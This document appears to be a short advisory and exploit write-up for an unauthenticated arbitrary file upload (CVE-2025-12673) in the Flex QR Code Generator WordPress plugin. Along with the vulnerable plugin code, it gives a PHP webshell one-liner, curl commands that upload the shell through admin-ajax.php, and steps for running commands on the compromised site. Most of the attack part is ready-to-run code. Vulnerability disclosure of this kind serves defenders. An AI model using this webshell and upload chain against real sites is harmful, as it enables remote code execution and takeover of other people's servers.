Flex QR Code Generator <= 1.2.6 - Unauthenticated Arbitrary File Upload

- 2 mins read

CVE-2025-12673

The Flex QR Code Generator plugin does not validate user permission or sanitize file uploads in its update_qr_code AJAX endpoint, allowing unauthenticated attackers to upload arbitrary files including executable PHP scripts, leading to remote code execution.

TL;DR Exploits

# Upload PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -F "action=flexqr_update_qr" \
  -F "qrId=1" \
  -F "qrData={\"data\":\"https://example.com\"}" \
  -F "logo=@shell.php"

Details

The vulnerability exists in the update_qr_code method of the FlexQrCodeGenerator class. The plugin registers AJAX endpoints for unauthenticated users, allowing any visitor to upload arbitrary files that get stored in the WordPress uploads directory.

Vulnerable code from /qr-code-generator.php:457-589:

public function update_qr_code()
{
  if (isset($_POST['qrData']) && isset($_POST['qrId'])) {
    // ... validation code ...
    
    // Handle the logo (file upload)
    if (isset($_FILES['logo']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {
      $logo = $_FILES['logo'];
      $upload_dir = wp_upload_dir();
      
      $file_ext = pathinfo($logo['name'], PATHINFO_EXTENSION);
      $file_name = pathinfo($logo['name'], PATHINFO_FILENAME);
      $new_file_name = $file_name . '_' . $qrId . '.' . $file_ext;
      $file_path = $upload_dir['path'] . '/' . $new_file_name;
      
      if (move_uploaded_file($logo['tmp_name'], $file_path)) {
        // File uploaded successfully
      }
    }
  }
}

File execution from /qr-code-generator.php:504:

if (move_uploaded_file($logo['tmp_name'], $file_path)) {
  $logo_url = $upload_dir['url'] . '/' . $new_file_name;
  $logo_url = str_replace(home_url(), '', $logo_url);
  $update_data['logo_url'] = $logo_url;
}

Unauthenticated access from /qr-code-generator.php:41-42:

add_action('wp_ajax_flexqr_update_qr', [$this, 'update_qr_code']);
add_action('wp_ajax_nopriv_flexqr_update_qr', [$this, 'update_qr_code']);

Manual Reproduction

  1. Identify target with Flex QR Code Generator plugin installed
  2. Find existing QR code ID:
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -d "action=flexqr_fetch_qr_code" \
  -d "per_page=10" \
  -d "page=1"
  1. Upload malicious PHP file:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -F "action=flexqr_update_qr" \
  -F "qrId=1" \
  -F "qrData={\"data\":\"https://example.com\"}" \
  -F "logo=@shell.php"
  1. Verify upload by checking the uploads directory for shell_1.php
  2. Execute commands by visiting the uploaded file with ?cmd=whoami